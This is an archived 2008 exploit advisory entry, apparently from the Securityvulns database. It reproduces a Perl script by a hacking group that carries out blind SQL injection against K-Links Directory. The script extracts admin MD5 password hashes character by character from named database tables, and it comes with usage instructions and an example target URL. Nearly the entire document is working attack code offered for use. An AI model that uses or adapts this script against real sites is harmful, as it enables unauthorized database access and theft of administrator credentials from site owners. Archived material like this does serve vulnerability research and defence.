K-Links Directory Blind SQL Injection Exploit

2008-08-12T00:00:00
ID SECURITYVULNS:DOC:20326
Type securityvulns
Reporter Securityvulns
Modified 2008-08-12T00:00:00

Description

!/usr/bin/perl

K-Links Directory Blind SQL Injection Exploit

..::virangar security team::..

www.virangar.net

C0d3d BY:virangar security team ( hadihadi )

special tnx to:

MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra

& all virangar members & all hackerz

my lovely friends hadi_aryaie2004 & arash(imm02tal)

..:::Young Iranina Hackerz::..

use HTTP::Request; use LWP::UserAgent;

if (@ARGV != 2){ header(); }

$host = $ARGV[0]; $mod=$ARGV[1]; if($mod==1){ $tbl="tbl_admin"; $col="upass"; } elsif($mod==2){ $tbl="platinum_admins"; $col="a_apss"; } else{ print "\nyour option not true\n"; exit; }

print "\n md5 Password:\r\n"; &halghe(); print "\n[+]Done\n";

sub halghe { for($i = 1; $i <= 32; $i++){ $f = 0; $n = 48; while(!$f && $n <= 57) { if(&inject($host ,$tbl ,$col ,$i, $n,)){ $f = 1; syswrite(STDOUT, chr($n), 1); } $n++; } if(!$f){ $n=97; while(!$f && $n <= 102) { if(&inject($host ,$tbl ,$col ,$i, $n,)){ $f = 1; syswrite(STDOUT, chr($n), 1); } $n++; }} } } sub inject { my $site = $[0]; my $tl = $[1]; my $cl = $[2]; my $a = $[3]; my $b = $_[4];

$attack= "$site"."%20and%20substring((select%20"."$cl"."%20from%20$tl%20limit%200,1),"."$a".",1)=char("."$b".")/*";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $req = $b->request(HTTP::Request->new(GET=>$attack)); $res = $req->content;

if ($res !~ m/You have an error in your SQL syntax;/i and $res !~ m/Table.*doesn't exist/i ){ return 1; }

} sub header { print qq{

K-Links Directory Blind SQL Injection Exploit

www.virangar.net

Useage: perl $0 Host option

option: 1 [table=tbl_admin & column=upass]

2 [table=platinum_admins & column=a_pass]

Host: full patch to Report Link+id (dont forget http://)

Example:

perl $0 http://site.com/report/1 2

}; }